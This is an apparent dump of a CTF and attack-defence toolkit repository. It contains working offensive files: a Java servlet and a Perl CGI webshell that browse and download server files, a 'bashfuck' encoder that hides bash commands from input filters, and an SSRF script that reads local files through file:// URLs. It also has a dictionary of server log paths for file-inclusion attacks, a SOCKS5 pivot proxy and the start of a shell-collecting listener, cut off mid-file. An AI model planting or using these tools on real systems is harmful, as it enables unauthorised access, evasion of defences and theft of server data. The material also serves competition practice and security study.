55 | printwriter.write("-");
56 | if(afile[i].canWrite())
57 | printwriter.write("w");
58 | else
59 | printwriter.write("-");
60 | printwriter.write(") " + s1.toString() + " " + "( Size: " + afile[i].length() + " bytes )
\n");
61 | }
62 |
63 | printwriter.write("
");
64 | } else
65 | if(file.canRead())
66 | {
67 | FileInputStream fileinputstream = new FileInputStream(file);
68 | int j = 0;
69 | while(j >= 0)
70 | {
71 | j = fileinputstream.read();
72 | printwriter.write(j);
73 | }
74 | fileinputstream.close();
75 | } else
76 | {
77 | printwriter.write("Can't Read file
");
78 | }
79 |
80 | }
81 |
82 |
83 | public String getServletInfo() {
84 | return "Directory Listing";
85 | }
86 | }
--------------------------------------------------------------------------------
/scripts/socks5.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | # Python Dynamic Socks5 Proxy
3 | # Usage: python socks5.py 1080
4 | # Background Run: nohup python s5.py 1080 &
5 |
6 | import socket, sys, select, SocketServer, struct, time
7 |
8 | class ThreadingTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer): pass
9 | class Socks5Server(SocketServer.StreamRequestHandler):
10 | def handle_tcp(self, sock, remote):
11 | fdset = [sock, remote]
12 | while True:
13 | r, w, e = select.select(fdset, [], [])
14 | if sock in r:
15 | if remote.send(sock.recv(4096)) <= 0: break
16 | if remote in r:
17 | if sock.send(remote.recv(4096)) <= 0: break
18 | def handle(self):
19 | try:
20 | pass # print 'from ', self.client_address nothing to do.
21 | sock = self.connection
22 | # 1. Version
23 | sock.recv(262)
24 | sock.send("\x05\x00");
25 | # 2. Request
26 | data = self.rfile.read(4)
27 | mode = ord(data[1])
28 | addrtype = ord(data[3])
29 | if addrtype == 1: # IPv4
30 | addr = socket.inet_ntoa(self.rfile.read(4))
31 | elif addrtype == 3: # Domain name
32 | addr = self.rfile.read(ord(sock.recv(1)[0]))
33 | port = struct.unpack('>H', self.rfile.read(2))
34 | reply = "\x05\x00\x00\x01"
35 | try:
36 | if mode == 1: # 1. Tcp connect
37 | remote = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
38 | remote.connect((addr, port[0]))
39 | pass # print 'To', addr, port[0] nothing do to.
40 | else:
41 | reply = "\x05\x07\x00\x01" # Command not supported
42 | local = remote.getsockname()
43 | reply += socket.inet_aton(local[0]) + struct.pack(">H", local[1])
44 | except socket.error:
45 | # Connection refused
46 | reply = '\x05\x05\x00\x01\x00\x00\x00\x00\x00\x00'
47 | sock.send(reply)
48 | # 3. Transfering
49 | if reply[1] == '\x00': # Success
50 | if mode == 1: # 1. Tcp connect
51 | self.handle_tcp(sock, remote)
52 | except socket.error:
53 | pass #print 'error' nothing to do .
54 | except IndexError:
55 | pass
56 | def main():
57 | filename = sys.argv[0];
58 | if len(sys.argv)<2:
59 | print 'usage: ' + filename + ' port'
60 | sys.exit()
61 | socks_port = int(sys.argv[1]);
62 | server = ThreadingTCPServer(('', socks_port), Socks5Server)
63 | print 'bind port: %d' % socks_port + ' ok!'
64 | server.serve_forever()
65 | if __name__ == '__main__':
66 | main()
--------------------------------------------------------------------------------
/tools/tarfile.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python2
2 | # -*- coding: utf-8 -*-
3 |
4 | import os
5 |
6 | __info__ = {
7 | "desc": "Output a tar file by script",
8 | "version": "1.0",
9 | "usage": "tarfile filename content_name content_data"
10 | }
11 |
12 |
13 | def tarfile(content_name='test.php', content_data='test'):
14 | if len(content_name) > 100:
15 | print 'content_name error'
16 | return
17 | t_name = content_name + '\x00' * (100 - len(content_name))
18 | t_mode = '0000664\x00'
19 | t_uid = '0001750\x00'
20 | t_gid = '0001750\x00'
21 | t_size = '00000000004\x00'
22 | t_mtime = '01274124644\x00'
23 | t_chksum = ''
24 | t_typeflag = '0'
25 | t_linkname = '\x00' * 100
26 | t_magic = 'ustar\x32'
27 | t_version = '\x32\x00'
28 | t_uname = 'root' + '\x00' * (32 - 4)
29 | t_gname = 'root' + '\x00' * (32 - 4)
30 | t_devmajor = '\x00' * 8
31 | t_devminor = '\x00' * 8
32 | t_prefix = '\x00' * 155
33 | t_padding = '\x00' * 12
34 | t_block = content_data + '\x00' * (512 - len(content_data))
35 | if len(content_data) < 1000:
36 | s = str(len(content_data))
37 | if len(content_data) > 0 and len(content_data) < 10:
38 | t_size = '0000000000' + s + '\x00'
39 | elif len(content_data) > 10 and len(content_data) < 100:
40 | t_size = '000000000' + s + '\x00'
41 | elif len(content_data) > 100:
42 | t_size = '00000000' + s + '\x00'
43 | else:
44 | return 0
45 | _a = t_name + t_mode + t_uid + t_gid + t_size + t_mtime
46 | _b = t_typeflag + t_linkname + t_magic + t_version + t_uname + \
47 | t_gname + t_devmajor + t_devminor + t_prefix + t_padding
48 | _t = _a + _b
49 | _sum = 0
50 | for j in _t:
51 | _sum += ord(j)
52 | t_chksum = '0' * (8 - len(str(oct(_sum + 256)))) + str(oct(_sum + 256))
53 | return _a + t_chksum + _b + t_block + '\x00' * 512
54 |
55 |
56 | def saveToFile(filename, tarData):
57 | f = open(filename, 'wb')
58 | f.write(tarData)
59 | f.close()
60 |
61 |
62 | def run(fn, cn, cd):
63 | filename = fn + ".tar"
64 | content_name = cn or "virink.txt"
65 | content_data = cd or "virink"
66 | print 'Runing...'
67 | saveToFile(filename, tarfile(content_name, content_data))
68 | if os.path.exists(filename):
69 | print os.path.join("./", filename)
70 | else:
71 | print False
72 |
73 | if __name__ == '__main__':
74 | run('9981', '2333', 'ddddd')
75 |
--------------------------------------------------------------------------------
/coder/bashfuck.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 |
4 | import sys
5 | import os
6 | from pwn import *
7 | import argparse
8 |
9 | """
10 | 0xddaa
11 | https://github.com/0xddaa/bashfuck
12 | encode a bash command with charset $, (, ), #, !, {, }, <, \, '.
13 | """
14 |
15 | n = dict()
16 | n[0] = '$#'
17 | n[1] = '${##}'
18 | n[2] = '$(({n1}<<{n1}))'.format(n1=n[1])
19 | n[3] = '$(({n2}#{n1}{n1}))'.format(n2=n[2], n1=n[1])
20 | n[4] = '$(({n2}#{n1}{n0}{n0}))'.format(n2=n[2], n1=n[1], n0=n[0])
21 | n[5] = '$(({n2}#{n1}{n0}{n1}))'.format(n2=n[2], n1=n[1], n0=n[0])
22 | n[6] = '$(({n2}#{n1}{n1}{n0}))'.format(n2=n[2], n1=n[1], n0=n[0])
23 | n[7] = '$(({n2}#{n1}{n1}{n1}))'.format(n2=n[2], n1=n[1])
24 |
25 |
26 | def split(cmd):
27 | argv = []
28 | token = ''
29 | quote = False
30 | for c in cmd:
31 | if c == ' ' and not quote:
32 | argv.append(token)
33 | token = ''
34 | elif c == '\'':
35 | quote = not quote
36 | else:
37 | token += c
38 | argv.append(token)
39 | return argv
40 |
41 |
42 | def str_to_oct(cmd):
43 | s = "$\\'"
44 | for _ in cmd:
45 | o = ('%s' % (oct(ord(_)).lstrip('0'))).rjust(3, '0')
46 | e = '\\\\' + ''.join(n[int(d)] for d in o)
47 | s += e
48 | s += "\\'"
49 | return s
50 |
51 |
52 | def arg_to_cmd(arg):
53 | cmd = '{'
54 | cmd += ','.join(str_to_oct(_) for _ in arg)
55 | cmd += ',}'
56 | return cmd
57 |
58 |
59 | def encode(cmd):
60 | log.info('cmd: `{}`'.format(cmd))
61 | bash = '${!#}'
62 | cmd = "bash -c '{}'".format(cmd)
63 | exp = "%s<<<%s" % (bash, arg_to_cmd(split(cmd)))
64 | log.info('result ({} byte): {}'.format(len(exp), exp))
65 | return exp
66 |
67 |
68 | def execute(bashfuck):
69 | with context.local(log_level='ERROR'):
70 | r = process('/bin/bash')
71 | r.sendline(bashfuck)
72 | r.sendline('echo GGGGGGGG; exit')
73 | log.info(r.recvuntil('GGGGGGGG', drop=True).strip())
74 | with context.local(log_level='ERROR'):
75 | r.close()
76 |
77 |
78 | if __name__ == '__main__':
79 | parser = argparse.ArgumentParser(prog=sys.argv[0],
80 | description="encode a bash command with charset $,(,),#,!,{,},<,\\,'")
81 | parser.add_argument('cmd')
82 | parser.add_argument('-t', '--test', action='store_true',
83 | help='test bashfuck and output result')
84 | args = parser.parse_args()
85 |
86 | if args.test:
87 | execute(encode(args.cmd))
88 | else:
89 | encode(args.cmd)
90 |
--------------------------------------------------------------------------------
/wrapper/wrapper_socket.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #include
5 | #include
6 | #include
7 | #include
8 |
9 | #define BUFSIZE 1000
10 | #define SOCK_PATH "/tmp/wrapper"
11 |
12 | char *buf;
13 |
14 | void quit()
15 | {
16 | exit(0);
17 | }
18 |
19 | void timeout()
20 | {
21 | printf("Times Up!\n");
22 | fflush(stdout);
23 | exit(0);
24 | }
25 |
26 | int main()
27 | {
28 |
29 | int pid;
30 |
31 | buf = (char*) malloc(BUFSIZE);
32 | int n;
33 |
34 | unlink(SOCK_PATH);
35 | int s = socket(AF_UNIX, SOCK_STREAM, 0);
36 | struct sockaddr_un addr;
37 | memcpy(addr.sun_path, SOCK_PATH, strlen(SOCK_PATH));
38 | addr.sun_family = AF_UNIX;
39 | bind(s, (struct sockaddr *)&addr, strlen(addr.sun_path) + sizeof(addr.sun_family));
40 | listen(s, 5);
41 |
42 | pid = fork();
43 |
44 | if (pid){ //parent
45 | signal(SIGCHLD, quit);
46 | signal(SIGALRM, timeout);
47 | alarm(10);
48 |
49 | struct sockaddr_un child;
50 | int clen = sizeof(child);
51 | int cs = accept(s, (struct sockaddr *) &child, &clen);
52 |
53 | if (cs == -1) {
54 | fprintf(stderr, "server socket fail\n");
55 | exit(0);
56 | }
57 |
58 | // get
59 | n = read(cs, buf, BUFSIZE);
60 | write(1, buf, n);
61 |
62 | while (1) {
63 | // hijack input
64 | n = read(0, buf, BUFSIZE);
65 | if (strstr(buf, "flag")) { // filter
66 | fprintf(stderr, "pwn?\n");
67 | exit(0);
68 | }
69 |
70 | write(cs, buf, n);
71 | bzero(buf, BUFSIZE);
72 |
73 | // hijack output
74 | n = read(cs, buf, BUFSIZE);
75 | write(1, buf, n);
76 | }
77 |
78 | } else { //child
79 | int s = socket(AF_UNIX, SOCK_STREAM, 0);
80 | struct sockaddr_un addr;
81 | bzero(addr.sun_path, sizeof(addr.sun_path));
82 | memcpy(addr.sun_path, SOCK_PATH, strlen(SOCK_PATH));
83 | addr.sun_family = AF_UNIX;
84 | connect(s, (struct sockaddr *)&addr, strlen(addr.sun_path) + sizeof(addr.sun_family));
85 | if (s == -1) {
86 | fprintf(stderr, "cli socket fail\n");
87 | exit(0);
88 | }
89 | dup2(s, 0);
90 | dup2(s, 1);
91 | execve("./applestore", NULL, NULL);
92 | }
93 |
94 | return 0;
95 | }
96 |
--------------------------------------------------------------------------------
/webshell/pl-cgi/list.pl:
--------------------------------------------------------------------------------
1 | #!/usr/bin/perl
2 | #
3 | # PerlKit-0.1 - http://www.t0s.org
4 | #
5 | # browse.pl: Browse and download files from a webserver
6 |
7 | use strict;
8 |
9 | my ($path, %FORM);
10 |
11 | $|=1;
12 |
13 |
14 | # Get parameters
15 |
16 | %FORM = parse_parameters($ENV{'QUERY_STRING'});
17 |
18 | if(defined $FORM{'path'}) {
19 | $path = $FORM{'path'};
20 |
21 |
22 | } else {
23 | $path = "/";
24 | }
25 |
26 | if(-f $path) { # Download selected file
27 | print "Content-Type: application/octet-stream\r\n";
28 | print "\r\n";
29 | open(FILE, "< $path") || print "Could not open file\n";
30 |
31 | while() {
32 | print;
33 | }
34 |
35 | close(FILE);
36 | exit;
37 | }
38 |
39 | print "Content-Type: text/html\r\n";
40 | print "\r\n";
41 |
42 | print '
43 |
44 |
48 | Directory ' . $path . ' contents:
49 |
50 |
51 | ';
52 |
53 | if(defined $FORM{'path'}) {
54 |
55 | opendir(DIR, $path) || print "Could not open directory";
56 |
57 | foreach (sort(readdir(DIR))) {
58 | print get_fileinfo($path, $_). "\n";
59 | }
60 |
61 | closedir(DIR);
62 |
63 | }
64 |
65 | print "
";
66 |
67 | sub parse_parameters ($) {
68 | my %ret;
69 |
70 | my $input = shift;
71 |
72 | foreach my $pair (split('&', $input)) {
73 | my ($var, $value) = split('=', $pair, 2);
74 |
75 | if($var) {
76 | $value =~ s/\+/ /g ;
77 | $value =~ s/%(..)/pack('c',hex($1))/eg;
78 |
79 | $ret{$var} = $value;
80 | }
81 | }
82 |
83 | return %ret;
84 | }
85 |
86 | sub get_fileinfo ($$) {
87 | my $ret;
88 |
89 | my ($dir,$filename) = @_;
90 | my $file = $dir . "/" . $filename;
91 |
92 | $file=~s/\/+/\//g;
93 |
94 | $ret = "
";
95 |
96 | $ret .= "";
97 |
98 | if(-d $file) {
99 | $file=~s/\/[^\/]+\/\.\./\//g;
100 | $ret .= "$filename";
101 | } else {
102 | $ret .= "$filename [D]" ;
103 | }
104 | $ret .= " ";
105 |
106 | my ($dev,$ino,$mode,$nlink,$uid,$gid,$rdev,$size, $atime,$mtime,$ctime,$blksize,$blocks) = stat($file);
107 |
108 | $ret .= " ";
109 | $ret .= "$size ";
110 | $ret .= "". getpwuid($uid) ." ";
111 | $ret .= "". getgrgid($gid) ." ";
112 |
113 | $ret .= " ";
114 |
115 | return $ret;
116 | }
117 |
--------------------------------------------------------------------------------
/scripts/reset_mysql_root_password.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:~/bin
3 | export PATH
4 |
5 | # Check if user is root
6 | if [ $(id -u) != "0" ]; then
7 | echo "Error: You must be root to run this script!"
8 | exit 1
9 | fi
10 |
11 | echo "+-------------------------------------------------------------------+"
12 | echo "| Reset MySQL/MariaDB root Password for LNMP, Written by Licess |"
13 | echo "+-------------------------------------------------------------------+"
14 | echo "| A tool to reset MySQL/MariaDB root password for LNMP |"
15 | echo "+-------------------------------------------------------------------+"
16 | echo "| For more information please visit https://lnmp.org |"
17 | echo "+-------------------------------------------------------------------+"
18 | echo "| Usage: ./reset_mysql_root_password.sh |"
19 | echo "+-------------------------------------------------------------------+"
20 |
21 | if [ -s /usr/local/mariadb/bin/mysql ]; then
22 | DB_Name="mariadb"
23 | DB_Ver=`/usr/local/mariadb/bin/mysql_config --version`
24 | elif [ -s /usr/local/mysql/bin/mysql ]; then
25 | DB_Name="mysql"
26 | DB_Ver=`/usr/local/mysql/bin/mysql_config --version`
27 | else
28 | echo "MySQL/MariaDB not found!"
29 | exit 1
30 | fi
31 |
32 | while :;do
33 | DB_Root_Password=""
34 | read -p "Enter New ${DB_Name} root password: " DB_Root_Password
35 | if [ "${DB_Root_Password}" = "" ]; then
36 | echo "Error: Password can't be NULL!!"
37 | else
38 | break
39 | fi
40 | done
41 |
42 | echo "Stoping ${DB_Name}..."
43 | /etc/init.d/${DB_Name} stop
44 | echo "Starting ${DB_Name} with skip grant tables"
45 | /usr/local/${DB_Name}/bin/mysqld_safe --skip-grant-tables >/dev/null 2>&1 &
46 | sleep 5
47 | echo "update ${DB_Name} root password..."
48 | if echo "${DB_Ver}" | grep -Eqi '^8.0.|^5.7.|^10.2.'; then
49 | /usr/local/${DB_Name}/bin/mysql -u root << EOF
50 | FLUSH PRIVILEGES;
51 | ALTER USER 'root'@'localhost' IDENTIFIED BY '${DB_Root_Password}';
52 | EOF
53 | else
54 | /usr/local/${DB_Name}/bin/mysql -u root << EOF
55 | update mysql.user set password = Password('${DB_Root_Password}') where User = 'root';
56 | EOF
57 | fi
58 |
59 | if [ $? -eq 0 ]; then
60 | echo "Password reset succesfully. Now killing mysqld softly"
61 | killall mysqld
62 | sleep 5
63 | echo "Restarting the actual ${DB_Name} service"
64 | /etc/init.d/${DB_Name} start
65 | echo "Password successfully reset to '${DB_Root_Password}'"
66 | else
67 | echo "Reset ${DB_Name} root password failed!"
68 | fi
69 |
--------------------------------------------------------------------------------
/tools/socks5.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | # Python Dynamic Socks5 Proxy
3 | # Usage: python socks5.py 1080
4 | # Background Run: nohup python s5.py 1080 &
5 |
6 | import socket
7 | import sys
8 | import select
9 | import SocketServer
10 | import struct
11 | import time
12 |
13 |
14 | class ThreadingTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
15 | pass
16 |
17 |
18 | class Socks5Server(SocketServer.StreamRequestHandler):
19 |
20 | def handle_tcp(self, sock, remote):
21 | fdset = [sock, remote]
22 | while True:
23 | r, w, e = select.select(fdset, [], [])
24 | if sock in r:
25 | if remote.send(sock.recv(4096)) <= 0:
26 | break
27 | if remote in r:
28 | if sock.send(remote.recv(4096)) <= 0:
29 | break
30 |
31 | def handle(self):
32 | try:
33 | pass # print 'from ', self.client_address nothing to do.
34 | sock = self.connection
35 | # 1. Version
36 | sock.recv(262)
37 | sock.send("\x05\x00")
38 | # 2. Request
39 | data = self.rfile.read(4)
40 | mode = ord(data[1])
41 | addrtype = ord(data[3])
42 | if addrtype == 1: # IPv4
43 | addr = socket.inet_ntoa(self.rfile.read(4))
44 | elif addrtype == 3: # Domain name
45 | addr = self.rfile.read(ord(sock.recv(1)[0]))
46 | port = struct.unpack('>H', self.rfile.read(2))
47 | reply = "\x05\x00\x00\x01"
48 | try:
49 | if mode == 1: # 1. Tcp connect
50 | remote = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
51 | remote.connect((addr, port[0]))
52 | pass # print 'To', addr, port[0] nothing do to.
53 | else:
54 | reply = "\x05\x07\x00\x01" # Command not supported
55 | local = remote.getsockname()
56 | reply += socket.inet_aton(local[0]) + \
57 | struct.pack(">H", local[1])
58 | except socket.error:
59 | # Connection refused
60 | reply = '\x05\x05\x00\x01\x00\x00\x00\x00\x00\x00'
61 | sock.send(reply)
62 | # 3. Transfering
63 | if reply[1] == '\x00': # Success
64 | if mode == 1: # 1. Tcp connect
65 | self.handle_tcp(sock, remote)
66 | except socket.error:
67 | pass # print 'error' nothing to do .
68 | except IndexError:
69 | pass
70 |
71 |
72 | def main():
73 | filename = sys.argv[0]
74 | if len(sys.argv) < 2:
75 | print 'usage: ' + filename + ' port'
76 | sys.exit()
77 | socks_port = int(sys.argv[1])
78 | server = ThreadingTCPServer(('', socks_port), Socks5Server)
79 | print 'bind port: %d' % socks_port + ' ok!'
80 | server.serve_forever()
81 | if __name__ == '__main__':
82 | main()
83 |
--------------------------------------------------------------------------------
/scripts/xxtea_decrypt.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #include
5 |
6 | // flag{xxtea_1s_1nterest1ng_ha-_-ha}
7 |
8 | #define DELTA 0x9e3779b9 // 2654435769
9 | #define MX (((z >> 5 ^ y << 2) + (y >> 3 ^ z << 4)) ^ ((sum ^ y) + (key[(p & 3) ^ e] ^ z)))
10 |
11 |
12 | void btea(uint32_t *, int, uint32_t const key[4]);
13 | void pack(uint64_t *, uint32_t, uint32_t);
14 | void unpack(uint64_t , uint32_t *, uint32_t *);
15 |
16 | char crypt[300]="\x56\x95\xd7\xfb\x7b\xd5\xb4\x8b\xe6\xd2\xba\xa4\x4c\x71\x52\xa4\x34\x2d\xfd\xf9\x46\xdb\x89\x7a\xba\xcb\xc5\x6d\xa2\x07\x9a\x78\x3b\x62\x5f\x64\xfd\x5e\x02\x03\x3a\x7a\x4c\x9f\x14\xee\xf6\xeb\x3a\x7a\x4c\x9f\x14\xee\xf6\xeb\xcc\x28\x37\x81\xe9\x24\xa6\x8f\xb1\x79\xb6\x74\x2b\xd6\x4b\xce\x34\x2d\xfd\xf9\x46\xdb\x89\x7a\x08\x7a\xbd\x54\x6b\x82\xb3\x2f\xbb\x9b\x6c\x63\x7d\xc2\xfe\x13\x0d\xc8\xb3\x93\x3b\x34\x01\x25\x08\x7a\xbd\x54\x6b\x82\xb3\x2f\xbb\x9b\x6c\x63\x7d\xc2\xfe\x13\x5b\xc0\x36\xe1\x62\xa1\x59\xe1\xcc\x28\x37\x81\xe9\x24\xa6\x8f\xb1\x79\xb6\x74\x2b\xd6\x4b\xce\x18\xb7\x12\xac\x14\x40\x5c\xca\xb1\x79\xb6\x74\x2b\xd6\x4b\xce\x0d\xc8\xb3\x93\x3b\x34\x01\x25\xcc\x28\x37\x81\xe9\x24\xa6\x8f\xbb\x9b\x6c\x63\x7d\xc2\xfe\x13\x5b\xc0\x36\xe1\x62\xa1\x59\xe1\xba\xcb\xc5\x6d\xa2\x07\x9a\x78\x08\x7a\xbd\x54\x6b\x82\xb3\x2f\x16\x31\x4b\x54\xef\x95\xa5\x49\x34\x2d\xfd\xf9\x46\xdb\x89\x7a\x1f\x27\x75\xa5\x94\x46\x27\xe3\x08\x7a\xbd\x54\x6b\x82\xb3\x2f\x1f\x27\x75\xa5\x94\x46\x27\xe3\x16\x31\x4b\x54\xef\x95\xa5\x49\x34\x2d\xfd\xf9\x46\xdb\x89\x7a\xd8\xf3\x37\x26\x1f\x46\xff\x17\x5d\x88\x2e\x70\xef\xd7\x12\xb3";
17 |
18 |
19 | int main(int argc, char *argv[])
20 | {
21 | uint32_t key[4] = {0x342d3221, 0x4320fa22, 0x46257a42, 0x9002bf22};
22 | uint64_t b64;
23 | uint32_t b64_split[2];
24 | int ji=0;
25 |
26 | while (1) {
27 | if (ji>=35) {
28 | return 0;
29 | }
30 | memcpy(&b64,&crypt[8*ji],8);
31 | //fread(&b64, sizeof(uint64_t), 1, stdin);
32 | if (b64 == 0x00000000ffffffff)
33 | break;
34 | unpack(b64, &b64_split[0], &b64_split[1]);
35 |
36 | btea(b64_split, -2, key);
37 |
38 | pack(&b64, b64_split[0], b64_split[1]);
39 |
40 | putc(b64, stdout);
41 |
42 | ji+=1;
43 | }
44 |
45 | return 0;
46 | }
47 |
48 |
49 | void btea(uint32_t *v, int n, uint32_t const key[4])
50 | {
51 | uint32_t y, z, sum;
52 | unsigned p, rounds, e;
53 | n = -n;
54 | rounds = 6 + 52/n;
55 | sum = rounds * DELTA;
56 | y = v[0];
57 | do {
58 | e = (sum >> 2) & 3;
59 | for (p = n - 1; p > 0; p--) {
60 | z = v[p - 1];
61 | y = v[p] -= MX;
62 | }
63 | z = v[n - 1];
64 | y = v[0] -= MX;
65 | sum -= DELTA;
66 | } while (--rounds);
67 | }
68 |
69 |
70 | void pack(uint64_t *b64, uint32_t b32_0, uint32_t b32_1)
71 | {
72 | *b64 = ((uint64_t) b32_0) << 32 | b32_1;
73 | }
74 |
75 |
76 | void unpack(uint64_t b64, uint32_t *b32_0, uint32_t *b32_1)
77 | {
78 | *b32_0 = (uint32_t)((b64 & 0xFFFFFFFF00000000) >> 32);
79 | *b32_1 = (uint32_t)(b64 & 0xFFFFFFFF);
80 | }
81 |
--------------------------------------------------------------------------------
/tools/ssrf.py:
--------------------------------------------------------------------------------
1 | #!/bin/env python
2 | #-*- encoding: utf-8 -*-
3 |
4 | import requests as req
5 | import base64
6 | import re
7 | import sys
8 | import os
9 |
10 |
11 | def decode_base64(html):
12 | if 'data:image' in html:
13 | op = re.search(r'data:image/jpeg;base64, (\S)"$', html)
14 | if op:
15 | return op.group(1)
16 | else:
17 | return html
18 | else:
19 | return html
20 |
21 |
22 | def get_file(path, ispost=False):
23 | global url
24 | if ispost:
25 | res = req.post(url, data=ispost)
26 | else:
27 | res = req.get(url + path)
28 | html = res.content
29 | if res.status_code == 200: # and 'data:image' in html:
30 | # print res.url
31 | return html
32 | else:
33 | return False
34 |
35 |
36 | def get_one_file(path, data=False):
37 | global p
38 | _data = {}
39 | if data:
40 | _data = {
41 | data: p + path
42 | }
43 | html = get_file(path, _data)
44 | if html:
45 | # print html
46 | return html
47 | else:
48 | return ''
49 | # return decode_base64(html)
50 |
51 |
52 | def save_to_file(file_name, file_data, dic_name):
53 | print file_name
54 | with open(file_name, 'a') as f:
55 | if file_data:
56 | f.write(dic_name)
57 | f.write("\n")
58 | f.write(file_data)
59 | f.write("\n")
60 | f.write("\n")
61 |
62 |
63 | def get_dic(dic):
64 | c = []
65 | with open("../dict/" + dic) as f:
66 | c = f.readlines()
67 | c = [i.replace('\n', '') for i in c]
68 | return c
69 |
70 |
71 | def down_file_by_dict(dic_name, tmp, p=False):
72 | dics = get_dic(dic_name)
73 | for dic in dics:
74 | _dic_name = dic.split("/")
75 | _dic_name = _dic_name[len(_dic_name) - 1]
76 | print dic
77 | save_to_file("./../tmp/" + tmp, get_one_file(dic, p), dic)
78 | # sys.exit()
79 |
80 |
81 | def down_one_file(file_name, argv, save_dir):
82 | save_file = file_name.split("/")[-1]
83 | if not os.path.exists("/Users/virink/tmp/" + save_dir):
84 | os.mkdir("/Users/virink/tmp/" + save_dir)
85 | with open("/Users/virink/tmp/" + save_dir + "/" + save_file, 'w') as f:
86 | res = get_one_file(file_name, argv)
87 | print res
88 | f.write(res)
89 |
90 | if __name__ == '__main__':
91 | url = "http://sha4.chal.pwning.xxx/upload"
92 | p = 'file://'
93 | argv = 'url'
94 | # print get_one_file('/etc/apache2/apache2.conf', "url")
95 | # print get_one_file('/var/www/sha4/server.py', "url")
96 | # /var/tmp/comments/%s.file
97 | print get_one_file("/var/tmp/comments/8a9d7c33b323f0fbb3a82c4b9c157380.file", "url")
98 | # ###############
99 | # down_one_file('/var/www/sha4/admin.py', 'url', 'pctf_sha4')
100 | # down_file_by_dict('ssrf&lfi/proc.dic', 'pctf_sha4_proc.log', argv)
101 |
--------------------------------------------------------------------------------
/dict/ssrf/log.dic:
--------------------------------------------------------------------------------
1 | /Program Files/Apache Group/Apache/logs/access.log
2 | /Program Files/Apache Group/Apache/logs/error.log
3 | /apache/logs/access.log
4 | /apache/logs/error.log
5 | /apache2/logs/access.log
6 | /apache2/logs/error.log
7 | /etc/httpd/logs/acces.log
8 | /etc/httpd/logs/acces_log
9 | /etc/httpd/logs/access.log
10 | /etc/httpd/logs/access_log
11 | /etc/httpd/logs/error.log
12 | /etc/httpd/logs/error_log
13 | /etc/logrotate.d/vsftpd.log
14 | /etc/wu-ftpd/ftpaccess
15 | /logs/access.log
16 | /logs/access_log
17 | /logs/error.log
18 | /logs/error_log
19 | /logs/pure-ftpd.log
20 | /opt/lampp/logs/access.log
21 | /opt/lampp/logs/access_log
22 | /opt/lampp/logs/error.log
23 | /opt/lampp/logs/error_log
24 | /opt/xampp/logs/access.log
25 | /opt/xampp/logs/access_log
26 | /opt/xampp/logs/error.log
27 | /opt/xampp/logs/error_log
28 | /usr/local/apache/log
29 | /usr/local/apache/logs
30 | /usr/local/apache/logs/access.log
31 | /usr/local/apache/logs/access_log
32 | /usr/local/apache/logs/error.log
33 | /usr/local/apache/logs/error_log
34 | /usr/local/apache2/logs/access.log
35 | /usr/local/apache2/logs/access_log
36 | /usr/local/apache2/logs/error.log
37 | /usr/local/apache2/logs/error_log
38 | /usr/local/cpanel/logs
39 | /usr/local/cpanel/logs/access_log
40 | /usr/local/cpanel/logs/error_log
41 | /usr/local/cpanel/logs/license_log
42 | /usr/local/cpanel/logs/login_log
43 | /usr/local/cpanel/logs/stats_log
44 | /usr/local/etc/httpd/logs/access_log
45 | /usr/local/etc/httpd/logs/error_log
46 | /usr/local/www/logs/thttpd_log
47 | /var/adm/log/xferlog
48 | /var/apache/logs/access_log
49 | /var/apache/logs/error_log
50 | /var/cpanel/cpanel.config
51 | /var/log/access.log
52 | /var/log/access_log
53 | /var/log/apache-ssl/access.log
54 | /var/log/apache-ssl/error.log
55 | /var/log/apache/access.log
56 | /var/log/apache/access_log
57 | /var/log/apache/error.log
58 | /var/log/apache/error_log
59 | /var/log/apache2/access.log
60 | /var/log/apache2/access_log
61 | /var/log/apache2/error.log
62 | /var/log/apache2/error_log
63 | /var/log/error.log
64 | /var/log/error_log
65 | /var/log/exim/mainlog
66 | /var/log/exim/paniclog
67 | /var/log/exim/rejectlog
68 | /var/log/exim_mainlog
69 | /var/log/exim_paniclog
70 | /var/log/exim_rejectlog
71 | /var/log/ftp-proxy
72 | /var/log/ftp-proxy/ftp-proxy.log
73 | /var/log/ftplog/var/log/httpd/access_log
74 | /var/log/httpd/error_log
75 | /var/log/httpsd/ssl.access_log
76 | /var/log/httpsd/ssl_log
77 | /var/log/maillog
78 | /var/log/mysql.log
79 | /var/log/mysql/mysql-bin.log
80 | /var/log/mysql/mysql-slow.log
81 | /var/log/mysql/mysql.log
82 | /var/log/mysqlderror.log
83 | /var/log/proftpd/var/www/logs/access.log
84 | /var/log/pure-ftpd/pure-ftpd.log
85 | /var/log/pureftpd.log
86 | /var/log/thttpd_log
87 | /var/log/vsftpd.log
88 | /var/log/xferlog
89 | /var/mysql.log
90 | /var/www/log/access_log
91 | /var/www/log/error_log
92 | /var/www/logs/access_log
93 | /var/www/logs/error.log
94 | /var/www/logs/error_log
95 | /var/www/mgr/logs/access.log
96 | /var/www/mgr/logs/access_log
97 | /var/www/mgr/logs/error.log
98 | /var/www/mgr/logs/error_log
99 | /www/logs/proftpd.system.log
100 |
--------------------------------------------------------------------------------
/awd/shell_manager.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 |
4 | import SocketServer
5 | import threading
6 | import socket
7 |
8 | HOST = '0.0.0.0'
9 | PORT = 9999
10 | BUFSIZE = 1024 * 4
11 |
12 | CLIENTS = []
13 |
14 |
15 | class ThreadedTCPRequestHandler(SocketServer.BaseRequestHandler):
16 |
17 | def setup(self):
18 | # print(self.client_address)
19 | CLIENTS.append({self.client_address[0]: self.request})
20 |
21 | def handle(self):
22 | data = self.request.recv(BUFSIZE)
23 | cur_thread = threading.current_thread()
24 | # response = "{}: {}".format(cur_thread.name, data)
25 | print(data)
26 | print("\n")
27 | # self.request.sendall(response)
28 |
29 | def finish(self):
30 | print("finish\n")
31 | # print(self.client_address[0] + "\n")
32 |
33 |
